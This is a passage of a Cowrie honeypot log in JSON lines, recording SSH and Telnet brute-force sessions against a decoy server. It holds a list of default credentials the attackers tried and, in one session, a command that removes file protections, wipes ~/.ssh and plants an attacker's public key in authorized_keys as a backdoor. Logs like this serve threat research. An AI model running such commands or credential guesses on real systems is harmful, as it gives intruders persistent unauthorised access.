sh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:07.595928Z","src_ip":"212.227.235.229","session":"e810cdfa027f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59964,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9f4ab37909b","protocol":"ssh","message":"New connection: 212.227.235.229:59964 (1.2.3.4:22) [session: c9f4ab37909b]","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.371661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.372983Z","src_ip":"212.227.235.229","session":"c9f4ab37909b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.456561Z","src_ip":"212.227.235.229","session":"c9f4ab37909b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.557507Z","src_ip":"212.227.235.229","session":"e810cdfa027f"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.788025Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.791288Z","src_ip":"212.227.235.229","session":"e810cdfa027f"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345","message":"login attempt [tester/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T02:07:08.832412Z","src_ip":"212.227.235.229","session":"c9f4ab37909b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:09.919220Z","src_ip":"212.227.235.229","session":"c9f4ab37909b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53526,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b084ef76339","protocol":"ssh","message":"New connection: 212.227.235.229:53526 (1.2.3.4:22) [session: 5b084ef76339]","sensor":"my-vps","timestamp":"2025-09-09T02:07:38.755409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:38.756743Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:38.985976Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@123","message":"login attempt [root/huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:39.942428Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:07:40.461360Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:07:40.462063Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:07:40.463357Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:40.693832Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:07:41.171243Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.171912Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.403224Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.404088Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54242,"dst_ip":"1.2.3.4","dst_port":22,"session":"e20148d8fc02","protocol":"ssh","message":"New connection: 212.227.235.229:54242 (1.2.3.4:22) [session: e20148d8fc02]","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.631502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.632100Z","src_ip":"212.227.235.229","session":"e20148d8fc02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:41.861231Z","src_ip":"212.227.235.229","session":"e20148d8fc02"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:07:42.819482Z","src_ip":"212.227.235.229","session":"e20148d8fc02"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:44.051079Z","src_ip":"212.227.235.229","session":"e20148d8fc02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54874,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6de59b7c760","protocol":"ssh","message":"New connection: 212.227.235.229:54874 (1.2.3.4:22) [session: c6de59b7c760]","sensor":"my-vps","timestamp":"2025-09-09T02:07:44.279873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:44.280678Z","src_ip":"212.227.235.229","session":"c6de59b7c760"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:44.510793Z","src_ip":"212.227.235.229","session":"c6de59b7c760"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:45.470871Z","src_ip":"212.227.235.229","session":"c6de59b7c760"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:45.702425Z","src_ip":"212.227.235.229","session":"5b084ef76339"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:45.703415Z","src_ip":"212.227.235.229","session":"c6de59b7c760"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41462,"dst_ip":"1.2.3.4","dst_port":22,"session":"2004e5a1801e","protocol":"ssh","message":"New connection: 212.227.235.229:41462 (1.2.3.4:22) [session: 2004e5a1801e]","sensor":"my-vps","timestamp":"2025-09-09T02:07:49.394529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:49.403567Z","src_ip":"212.227.235.229","session":"2004e5a1801e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:49.650836Z","src_ip":"212.227.235.229","session":"2004e5a1801e"}
{"eventid":"cowrie.login.failed","username":"guest","password":"Password","message":"login attempt [guest/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:07:52.484703Z","src_ip":"212.227.235.229","session":"2004e5a1801e"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:53.747353Z","src_ip":"212.227.235.229","session":"2004e5a1801e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60590,"dst_ip":"1.2.3.4","dst_port":23,"session":"36d2b33ac774","protocol":"telnet","message":"New connection: 212.227.125.160:60590 (1.2.3.4:23) [session: 36d2b33ac774]","sensor":"my-vps","timestamp":"2025-09-09T02:07:57.473093Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:57.555544Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:07:57.607441Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T02:07:57.608608Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T02:07:57.609670Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49584,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a2fee27098c","protocol":"ssh","message":"New connection: 212.227.235.229:49584 (1.2.3.4:22) [session: 0a2fee27098c]","sensor":"my-vps","timestamp":"2025-09-09T02:08:12.005852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:08:12.006639Z","src_ip":"212.227.235.229","session":"0a2fee27098c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:08:12.093864Z","src_ip":"212.227.235.229","session":"0a2fee27098c"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"111111","message":"login attempt [deployer/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:08:12.482767Z","src_ip":"212.227.235.229","session":"0a2fee27098c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:08:13.573219Z","src_ip":"212.227.235.229","session":"0a2fee27098c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:08:15.967791Z","src_ip":"212.227.235.229","session":"88f67a1a10af"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:08:16.422360Z","src_ip":"212.227.235.229","session":"2fe265edfcfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49921,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ffa7c92356","protocol":"ssh","message":"New connection: 212.227.235.229:49921 (1.2.3.4:22) [session: 79ffa7c92356]","sensor":"my-vps","timestamp":"2025-09-09T02:09:07.934486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:07.943001Z","src_ip":"212.227.235.229","session":"79ffa7c92356"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:08.202389Z","src_ip":"212.227.235.229","session":"79ffa7c92356"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"Password1","message":"login attempt [appuser/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:09.247440Z","src_ip":"212.227.235.229","session":"79ffa7c92356"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:10.515152Z","src_ip":"212.227.235.229","session":"79ffa7c92356"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43110,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f082e16a6d3","protocol":"ssh","message":"New connection: 212.227.235.229:43110 (1.2.3.4:22) [session: 4f082e16a6d3]","sensor":"my-vps","timestamp":"2025-09-09T02:09:11.657180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:11.658147Z","src_ip":"212.227.235.229","session":"4f082e16a6d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:11.743307Z","src_ip":"212.227.235.229","session":"4f082e16a6d3"}
{"eventid":"cowrie.login.failed","username":"superman","password":"changeme","message":"login attempt [superman/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:12.127681Z","src_ip":"212.227.235.229","session":"4f082e16a6d3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:13.216180Z","src_ip":"212.227.235.229","session":"4f082e16a6d3"}
